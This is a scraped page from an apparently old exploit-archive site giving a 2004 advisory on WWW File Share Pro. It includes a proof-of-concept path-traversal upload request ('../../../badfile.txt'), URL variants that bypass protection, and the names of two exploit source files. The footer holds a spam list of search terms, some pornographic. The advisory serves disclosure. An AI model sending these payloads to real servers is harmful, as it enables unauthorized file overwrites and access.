exploits , vulnerabilities , articles , LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities
| Title |
LionMax Software WWW File Share Pro Multiple Remote Vulnerabilities |
| Published |
2004-01-14-12:00AM |
| Updated |
2004-01-14-10:21PM |
| Class |
Unknown |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery of these vulnerabilities has been credited to Luigi Auriemma <aluigi@altervista.org>. |
| Vulnerable |
LionMax Software WWW File Share Pro 2.42
LionMax Software WWW File Share Pro 2.41
LionMax Software WWW File Share Pro 2.40 |
| Not Vulnerable |
LionMax Software WWW File Share Pro 2.48
LionMax Software WWW File Share Pro 2.46 |
| Code |
The following proof of concept exploits were supplied:
POST /upload2.htm HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------00000000000000000000000000000 Content-Length: ignored_by_this_specific_server
-----------------------------00000000000000000000000000000 Content-Disposition: form-data; name="file"; filename="../../../badfile.txt" Content-Type: text/plain
I'm a bad file in a bad location. If you see me you are vulnerable because an attacker can upload a malicious file everywhere in your system overwriting any existent file. Now go to download the latest patch for your webserver or disable the Upload function! -----------------------------00000000000000000000000000000 Content-Disposition: form-data; name="Submit"
Upload -----------------------------00000000000000000000000000000--
http://server/directory./ http://server/directory/ http://server///directory/ "GET directory/ HTTP/1.0"
/data/vulnerabilities/exploits/webpostmem.c
/data/vulnerabilities/exploits/poststrike.c
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Fri, 18 Dec 2009 08:39:35 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
nude rani megarotica SSH bad jojo.c www.9yzz.c sri lanka www.bustyp MS05-051 xxxlsex.co Photo bugi citrix net album bugi www.xxxl.c Wap.Sex.Co www.xxsexx ocean sex. hometheate linux linu shoppingca suse 10.1 Indian sex php-nuke+2 www.zwf2.c news for c search/exp .p[kpokio egpyt song sexy hindi www.inden. www.bubuw. php-nuke+2 Realsoccer shopping c video hits red hat en www.de57.c kerala.sex mvies www.lilywe www.hifase bless www.inden. hz.2smtc.c www.sex ga Sex.ocean. news for c hot sexy n e-xoopport hot sexy n IPBoard 2
|